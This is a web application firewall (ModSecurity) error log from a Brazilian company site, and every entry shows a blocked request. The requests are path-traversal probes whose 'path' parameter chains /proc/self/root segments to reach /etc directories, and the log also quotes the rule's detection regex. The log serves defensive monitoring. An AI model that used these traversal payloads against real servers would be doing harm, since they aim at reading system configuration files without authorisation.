[Mon Mar 16 10:36:10.583566 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.241.46:50424] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHSv9ocpUE4ed4uDzg6QAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:36:10.585833 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.243.203:37986] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHSo6lpbStxTqkSkthEAAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:36:12.915637 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.241.46:50428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHTLABkC4fWIHEf8Hf4QAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:36:13.955084 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.243.203:38002] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHTbABkC4fWIHEf8Hf4gAAAFU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:36:15.300285 2026] [:error] [pid 21533:tid 140411691570944] [client 74.7.241.46:50436] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHT3jZBu2q05ozVU9JKQAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:36:16.608903 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.241.46:50448] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHUHjZBu2q05ozVU9JKwAAAUo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:36:18.990384 2026] [:error] [pid 21533:tid 140411641214720] [client 74.7.243.203:38008] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHUnjZBu2q05ozVU9JLQAAAUw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:36:24.644927 2026] [:error] [pid 32654:tid 140411616036608] [client 74.7.243.203:47446] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHWAlT9VtDQc7bgUygSwAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:36:32.758921 2026] [:error] [pid 10772:tid 140411557287680] [client 74.7.241.46:50462] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHYP9ocpUE4ed4uDzg_QAAAhY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:36:34.037110 2026] [:error] [pid 21533:tid 140411674785536] [client 74.7.241.46:41500] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHYnjZBu2q05ozVU9JMAAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:36:38.685019 2026] [:error] [pid 10772:tid 140411582465792] [client 74.7.243.203:47456] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHZv9ocpUE4ed4uDzhAwAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:36:38.772155 2026] [:error] [pid 21806:tid 140411548894976] [client 74.7.241.46:41510] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHZtSswJuvopo3lOhTqwAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 10:36:40.064525 2026] [:error] [pid 21533:tid 140411666392832] [client 74.7.243.203:33194] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHaHjZBu2q05ozVU9JMgAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:36:44.631695 2026] [:error] [pid 10709:tid 140411741927168] [client 74.7.241.46:37810] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHbBXjF1vJNtV6CWrs1wAAAcA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:36:47.891669 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.243.203:58650] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHb_9ocpUE4ed4uDzhCgAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:36:49.390491 2026] [:error] [pid 32654:tid 140411741927168] [client 74.7.241.46:37820] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHcQlT9VtDQc7bgUygTwAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:36:52.989655 2026] [:error] [pid 21533:tid 140411557287680] [client 74.7.241.46:57276] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHdHjZBu2q05ozVU9JNwAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:36:53.927222 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.243.203:58662] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHddSswJuvopo3lOhTsgAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:36:54.373951 2026] [:error] [pid 10709:tid 140411590858496] [client 74.7.241.46:57282] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHdhXjF1vJNtV6CWrs3QAAAdI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 10:37:03.188219 2026] [:error] [pid 11972:tid 140411741927168] [client 74.7.243.203:38056] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHf5qj1wV0Si-OkefdrAAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:37:05.610466 2026] [:error] [pid 21533:tid 140411716749056] [client 74.7.243.203:36272] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHgXjZBu2q05ozVU9JOwAAAUM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 10:37:09.150935 2026] [:error] [pid 10709:tid 140411674785536] [client 74.7.243.203:36284] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgHhRXjF1vJNtV6CWrs5AAAAcg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
